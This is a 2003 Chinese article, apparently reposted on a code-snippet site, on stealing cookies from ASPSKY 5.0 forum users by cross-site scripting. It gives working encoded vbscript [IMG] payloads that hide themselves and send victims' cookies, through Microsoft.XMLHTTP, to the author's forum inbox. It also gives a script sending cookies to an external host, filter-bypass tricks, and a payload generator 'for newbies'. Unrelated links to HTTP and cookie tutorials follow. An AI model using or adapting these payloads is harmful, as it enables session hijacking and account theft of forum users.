利用Microsoft.XMLHTTP控件发送COOKIE

作者:czy <czy82@elong.com>
出处:http://www.nsfocus.net
日期:2003-09-03

(注意由于论坛会对文章中的一些字符作处理,所以最好到
http://www.chinansl.com/czy/xmlhttp.txt看文章
http://www.chinansl.com/czy/aspsky5.htm测试代码)

跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个
问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送COOKIE,这样隐秘性
就大打折扣了。以前我想了一个在网页中用insertAdjacentHTML方法来注入HTML语句
的办法勉强可以作到发送COOKIE不出现IE窗口,但是在实际使用中有时会遇到IE出错。

没有更好的办法了吗?以前在研究VBS病毒自动升级的时候用到一个Microsoft.XMLHTTP
控件(该控件是WIN98/2K上都默认自带的东东,并且它是IE认为safe的控件!),通过它我们
可以在网页中给网站发送http请求,可以是POST也可以是GET.

好了思路已经到这儿来,下面我们可以实战一下,我以ASPSKY 5.0 0320为例子。
我们知道<IMG SRC="XXXXXXX">在SRC中可以写入vbscript:这样的语句。。比如
<img src="vbscript:a=(msgbox(now))">,但是我们只能执行一个语句,比如
<img src="vbscript:a=(msgbox(now)):b=(msgbox(now))">这样都将是错误的!
怎么办法呢?在VBS中我们可以用EXECUTE语句,在JS中我们可以使用EVAL语!
比如:<img src="vbscript:execute(&#34a=(msgbox(now)):b=(msgbox(&#34czy&#34&#34))&#34)">
或是<img src="javascript:eval('alert(\'nsfocus\');alert(\'czy\')')">

还没有晕吧?上面你可能会注意到用VBS的execute语句时双引号要换为"这是因为:
在VBS中单引号要括起字符串,必须是两个单引号代表一个又引号,并且在双引号内!
所以在execute语句中我们不能用单引号,而直接用"呢,在HTML进行引号匹配的时候
会和src="后的引号匹配,所以我们只能用"代替了。

引号的问题解决了,在实际应用中ASPSKY还会对我们的代码进行处理:
1:如果发现script字串,会在前面加上一个空格
2:如果发现http字串会认为是一个URL,并在两边加上<A>元素
3:如果发现空格会用 代替

解决问题:
1:vbscript用vbsCript代替
2:http用,&#34&#34ht&#34&#34+&#34&#34tp...代替(vbs中引号括引号里面的应用多一对,+代表连接符)
3:空格用&#32代替(注不是&#20)

在最后就是发送COOKIE的问题:
1:控件在本地可以GET,POST任意的网站,但是在网页中竟然只能
GET,POST当前服务器。。。。要不然IE就会说拒绝仿问!
2:cookie中不能有&等在URL中有特殊交意的字符

解决问题:

1:只能发给当前服务器,那么可以把COOKIE发到你在论坛上的注册的用户的邮箱嘛:)
2:replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34),在vbs中用
replace替换函用,在例子中我把"&"换成了"-"

问题都解决了下面是实际的例子:
动网aspsky 5.0 0320测试成功

//----------------------

[IMG]vbs&#67ript:execute(&#34dat=replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34):set&#32http=createobject(&#34&#34Microsoft.XMLHTTP&#34&#34):http.open&#32&#34&#34GET&#34&#34,&#34&#34ht&#34&#34+&#34&#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=news&submit=发送&message=&#34&#34&dat,false:http.send&#34)[/IMG]

说明:把COOKIE发给CZY用户,邮件标题叫news
//----------------------

另控件的正常用法:
<script language=vbs>
dat=document.cookie
set http=createobject("Microsoft.XMLHTTP")
http.open "POST","http://www.chinansl.com/czy/get.asp?cook="&dat,false
http.send
tt=http.responsetext
msgbox tt
</script>

让代码更完美,现在COOKIE已经乖乖的在我们的邮箱里了,但是有一个小问题由于图片不
能正常的显示会是一个小叉,旁边还有按此在新窗口浏览图片的提示。。。这又难免会让人
生疑。

解决思路:
一个网页中的所有IMG元素通过document.imanges都能例举到,并且可以设置它们的大小,当width=0时就
相当于HIDDEN了.通过比较元素的src属性的值是否含有"ript"就可以判断是不是我们的图片.另外比较时
大于符用&#62代替,0用&#48代替!

代码:
[IMG]vbs&#67ript:execute(&#34for&#32each&#32aa&#32in&#32document.images:if&#32instr(aa.src,&#34&#34ript&#34&#34)&#62&#48&#32then:aa.width=0:end&#32if:next&#34)[/IMG]

实际应用的代码:
[IMG]vbs&#67ript:execute(&#34for&#32each&#32aa&#32in&#32document.images:if&#32instr(aa.src,&#34&#34ript&#34&#34)&#62&#48&#32then:aa.width=0:end&#32if:next:dat=replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34):set&#32http=createobject(&#34&#34Microsoft.XMLHTTP&#34&#34):http.open&#32&#34&#34GET&#34&#34,&#34&#34ht&#34&#34+&#34&#34tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit=发送&message=&#34&#34&dat,false:http.send&#34)[/IMG]

//-------------------方便菜鸟使用:)

sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[IMG]vbs&#67ript:execute(&#34for&#32each&#32aa&#32in&#32document.images:if&#32instr(aa.src,&#34&#34ript&#34&#34)&#62&#48&#32then:aa.width=0:end&#32if:next:dat=replace(document.cookie,&#34&#34&&#34&#34,&#34&#34-&#34&#34):set&#32http=createobject(&#34&#34Microsoft.XMLHTTP&#34&#34):http.open&#32&#34&#34GET&#34&#34,&#34&#34ht&#34&#34+&#34&#34tp://"&loc&"/usersms.asp?action=send&touser="&user&"&title=news&submit=发送&message=&#34&#34&dat,false:http.send&#34)[/IMG]"
form1.area.value=str
end sub

ASPSKY 5.0 0320 COOKI搜集器--CZY

设置发送地址:

▲发送地址形如:www.nnit30.com/newbbs(newbbs是网站中论坛的安装目录最后不用加/,也不要http://头)

发送的用户名:-------------

生成的代码:)

[Ctrl+A 全选 注:如需引入外部Js需刷新才能执行]

(0)

相关推荐

  • 用VBS实现的发送带Cookie的HTTP请求的代码

    为了方便测试,先写一个回显Cookie的简单的PHP程序: 复制代码 代码如下: <?php foreach($_COOKIE as $key => $value) echo "$key => $value\r\n"; ?> 然后分别用ServerXMLHTTP和XMLHTTP测试: 复制代码 代码如下: Dim http Set http = CreateObject("Msxml2.XMLHTTP") http.open "GE

  • Python模仿POST提交HTTP数据及使用Cookie值的方法

    本文实例讲述了在Python中模仿POST HTTP数据及带Cookie提交数据的实现方法,分享给大家供大家参考.具体实现方法如下: 方法一 如果不使用Cookie, 发送HTTP POST非常简单: 复制代码 代码如下: import urllib2, urllib data = {'name' : 'www', 'password' : '123456'} f = urllib2.urlopen(         url     = 'http://www.jb51.net/',      

  • 详解HTTP Cookie状态管理机制

    HTTP cookies,通常又称作"cookies",已经存在了很长时间,但是仍旧没有被予以充分的理解.首要的问题是存在了诸多误区,认为cookies是后门程序或病毒,或压根不知道它是如何工作的.第二个问题是对于cookies缺少一个一致性的接口.尽管存在着这些问题,cookies仍旧在web开发中起着如此重要的作用,以至于如果cookie在没有可替代品出现的情况下消失,我们许多喜欢的Web应用将变得毫无用处. 一.cookie 起源 cookie 最早是网景公司的雇员 Lou Mo

  • C# HttpClient Cookie验证解决方法

    自实现的cookie 验证,远程取值的例子 以下代码配合HttpClient使用可以实现跨域(cookie的读写) //验证 复制代码 代码如下: HttpClient httpClient = new HttpClient(url, null, true); httpClient.PostingData.Add(key,value);//登录用户名 httpClient.PostingData.Add(key,value);//密码 string str = httpClient.GetStr

  • httpclient模拟登陆具体实现(使用js设置cookie)

    httpclient模拟登陆(使用js设置cookie) 复制代码 代码如下: <html> <meta http-equiv='Content-Type' content='text/html; charset=gb2312'> <link rel=stylesheet type=text/css href='/bbs.css'> <script>document.cookie='utmpnum=51;path=/;domain=.' + window.l

  • .net 获取浏览器Cookie(包括HttpOnly)实例分享

    一.接口文件 复制代码 代码如下: using System; using System.ComponentModel; using System.Net; using System.Runtime.InteropServices; using System.Security; using System.Security.Permissions; using System.Text; namespace CookieHandler {     internal sealed class INat

  • AndroidHttpClient使用Cookie应用分析

    今天想把一个用使用了HttpClient的自动签到小程序移植到Android上,还好Android的SDK自带了HttpClient的包.翻Android的文档时发现官方还提供了一个实现了HttpClient接口的AndroidHttpClient,上网搜了下没发现关于AndroidHttpClient的文章.当然也可以继续使用DefaultHttpClient,但用为Android定制的AndroidHttpClient自然更好. 下面是2个测试用的HttpServlet: 复制代码 代码如下

  • ASP利用XMLHTTP实现表单提交以及cookies的发送的代码

    确实,如果在原网站如果存在表单提交或cookies的验证,对于ASP来说,不使用基于SOCKET的组件就难以完成,其实,XMLHTTP的另外两个方法被我们忽略了,而这正是问题的关键. 下面首先来说说这个方法 1..send()         由于流行的小偷是使用的GET而不是POST来传送数据,所以很多人忽略了这个方法,而使用SEND发送数据也很简单,就是SEND("内容"),可是, 发送表单就不是这么简单,因为你发送的表单如果是中文的话,就要牵扯到编码的问题了. 首先,你在OPEN

  • 利用Microsoft.XMLHTTP控件发送COOKIE

    作者:czy <czy82@elong.com> 出处:http://www.nsfocus.net 日期:2003-09-03 (注意由于论坛会对文章中的一些字符作处理,所以最好到 http://www.chinansl.com/czy/xmlhttp.txt看文章 http://www.chinansl.com/czy/aspsky5.htm测试代码) 跨站脚本攻击想必各位都已经是很熟悉了,但是得到COOKIE的时候一直有一个 问题:总是要用WINDOW.OPEN弹一个窗体出来然后发送CO

  • 利用PyQT5日期控件制作一个小日历

    目录 介绍 主要代码 补充 介绍 日历的制作比较简单,因为pyqt5已经自带了相关的日期控件,只需要明白如何调用再加上比较个性化的功能,这个日历的小控件就制作完成了. 日历实现代码量不多,具体效果如下图 主要代码 在制作过程中使用到的python模块包说明: from PyQt5.QtWidgets import * # 窗口组件 from PyQt5.QtCore import * # 核心组件.日历组件就是在这个库 import sys # 操作系统处理库 在小日历的制作过程中只使用了一个槽

  • 利用Aspose.Word控件实现Word文档的操作

    Aspose系列的控件,功能都挺好,之前一直在我的Winform开发框架中用Aspose.Cell来做报表输出,可以实现多样化的报表设计及输出,由于一般输出的内容比较正规化或者多数是表格居多,所以一般使用Aspose.Cell来实现我想要的各种Excel报表输出.虽然一直也知道Aspose.Word是用来生成Word文档的,而且深信其也是一个很强大的控件,但一直没用用到,所以就不是很熟悉. 偶然一次机会,一个项目的报表功能指定需要导出为Word文档,因此寻找了很多篇文章,不过多数介绍的比较简单一

  • C#利用Label标签控件模拟窗体标题的移动及窗体颜色不断变换效果

    前言 标签(Label)控件是最常用的控件,在任何Windows应用程序中都可以中都可以看到标签控件.标签控件用于显示用户不能编辑的文件或图像,常用于对窗体上各种控件进行标注或说明. 在窗体中添加标签控件时,会创建一个Label类的实例.Label控件派生自Control控件,和其他控件一样支持事件,但通常不需要添加任何事件代码. 本文主要给大家介绍了关于C#用Label标签控件模拟窗体标题移动及窗体颜色不断变换的相关内容,分享出来供大家参考学习,下面话不多说了,来一起看看详细的介绍吧. 开发工

  • ASP.NET 统计图表控件小结

    1.OWC11 这个控件全称是:Office Web Component 11,是office2003中的一个组件,可惜的是office2007中没有了它的身影.不过安装office2003之后可以引用,然后使用.使用过的人都知道,就是它的效果要差一点. 2.dotnetCharting http://www.dotnetcharting.com/ dotnetcharting是国外的一个产品,是要收费的.具体还没有使用,后面在我尝试之后,我会添加一些使用范例.大家也可以上网搜索一下,很多的列子

  • 激活 ActiveX 控件

    激活 ActiveX 控件 发布日期: 2006-3-29 | 更新日期: 2006-3-29 Internet 开发索引 用户不能与 APPLET.EMBED 或 OBJECT 元素加载的 Microsoft ActiveX 控件直接交互.用户激活这些控件的用户界面后才可以与这些控件交互.本文介绍 Microsoft Internet Explorer 如何处理 ActiveX 控件,显示如何加载 ActiveX 控件才能激活它们的界面,还描述这种行为对辅助工具和宿主 WebBrowser 控

  • ASP.NET MVC中图表控件的使用方法

    微软发布了一个强大的ASP.NET的图表控件,支持丰富的图表选项设置-包括列,点,泡沫,饼图,圆环图,金字塔,漏斗,盒形图,面积,范围,AJAX的互动,以及更多.Microsoft图表控件示例项目包括ASP.NET页的图表样本超过200个.在这篇文章中,我将展示如何在ASP.NET MVC中使用图表控件. 这里介绍一个非常简单的项目,显示了一个类的结果比较.两个字段 - ID(这是唯一的一个学生)和GPA(平均成绩) - 代表一个特定的学生的结果.各种图表结果显示,学生的结果进行比较.我希望把重

  • 用.Net的File控件上传文件的解决方案

    在遍历了csdn中所有关于上传大文件的帖子以后,写了这篇垃圾.(:-)) 上传大文件,有好几种方法: 1.思归的HttpWorkerRequest方法,太难,看不懂:-( 2.利用第三方的控件 AspNetUpload 要钱!!算了,咱还是喜欢免费的. 3.修改web.config文件,但是不能捕获错误. 4.通过ftp的方式上传.服务器需要提供ftp服务. 没辙,只好选第三种方式,谁让咱太蠢了呢!(太蠢了,没有关系,要多吃鱼,听说吃鱼能聪明点.) 那就仔细专研第三种方式吧! 修改Webcong

  • c#打印预览控件中实现用鼠标移动页面功能代码分享

    该功能本来可以通过拉动水平和垂直滚动条来实现,但实际使用中,用户更趋向于直接用鼠标拖动页面来实现,很多看图类软件都有这种类似的功能.而.net的打印预览控件却很遗憾的没有提供这一功能,只来自己想办法来实现啦. 我的办法就是用代码来控制打印预览控件中的水平来垂直滚动条的位置,间接实现和用鼠标直接拖动滚动条一样的效果. 在实现这一功能的过程中,最大的困难是打印预览控件并没有让程序员直接调用的关于滚动条的方法或属性.所以只好向WinAPI求助了. 以下API函数和常量就是实现上述功能的关键了: 复制代

  • VS2010/MFC编程(常用控件:树形控件Tree Control控件创建h和实例)

    前面一节讲了树形控件Tree Control的简介.通知消息以及相关数据结构,本节继续讲下半部分,包括树形控件的创建.CTreeCtrl类的主要成员函数和应用实例. 树形控件的创建 MFC为树形控件提供了CTreeCtrl类,它封装了树形控件的所有操作. 树形控件的创建也是有两种方式,一种是在对话框模板中直接拖入Tree Control控件创建,另一种就是通过CTreeCtrl类的Create成员函数创建.下面主要讲后者. CTreeCtrl类的Create成员函数的原型如下: virtual

随机推荐